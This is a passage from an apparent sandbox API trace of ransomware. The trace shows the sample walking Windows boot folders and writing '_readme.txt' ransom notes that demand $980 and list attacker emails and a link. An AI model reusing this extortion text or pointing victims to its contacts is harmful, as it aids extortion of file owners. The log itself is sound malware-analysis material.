0x9b79750 [0093.899] PathAppendW (in: pszPath="C:\\Boot\\es-ES\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0093.899] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.899] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.899] PathFileExistsW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 0 [0093.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x9ba4d90 [0093.901] lstrcpyW (in: lpString1=0x9ba4d90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" [0093.901] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0093.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79fd8 [0093.901] CreateFileW (lpFileName="C:\\Boot\\es-ES\\_readme.txt" (normalized: "c:\\boot\\es-es\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0093.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0093.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x853) returned 0x333bc58 [0093.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333bc58, cbMultiByte=2131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1108 [0093.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0093.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0093.902] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1107 [0093.902] WriteFile (in: hFile=0x5c8, lpBuffer=0x32d0db8*, nNumberOfBytesToWrite=0x453, lpNumberOfBytesWritten=0x9e2fb64, lpOverlapped=0x0 | out: lpBuffer=0x32d0db8*, lpNumberOfBytesWritten=0x9e2fb64*=0x453, lpOverlapped=0x0) returned 1 [0093.903] CloseHandle (hObject=0x5c8) returned 1 [0093.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0093.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79fd8 | out: hHeap=0x630000) returned 1 [0093.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0093.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.904] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1832ee0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1832ee0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0093.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.904] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1832ee0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1832ee0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.904] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.905] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1832ee0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1832ee0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1832ee0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.905] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1832ee0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1832ee0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1832ee0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.905] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0093.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0093.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0093.905] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0093.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0093.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.908] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.908] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.908] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.908] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.908] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.908] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.908] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.908] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.908] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.908] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.908] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.908] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.908] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.908] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.908] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.908] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.908] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.908] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.908] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.908] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.908] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.908] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.908] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.908] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.908] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.908] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.908] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.908] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.909] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.909] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.909] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.909] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.909] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.909] PathFindFileNameW (pszPath="C:\\Boot\\fi-FI\\") returned="fi-FI\\" [0093.909] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.909] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.909] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.909] PathFindFileNameW (pszPath="") returned="" [0093.909] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.910] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.910] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x335e120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.910] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.910] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0093.910] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x335e120 | out: hHeap=0x630000) returned 1 [0093.910] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.910] PathAppendW (in: pszPath="C:\\Boot\\fi-FI\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0093.910] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.910] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.910] PathFileExistsW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 0 [0093.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x9ba4d90 [0093.911] lstrcpyW (in: 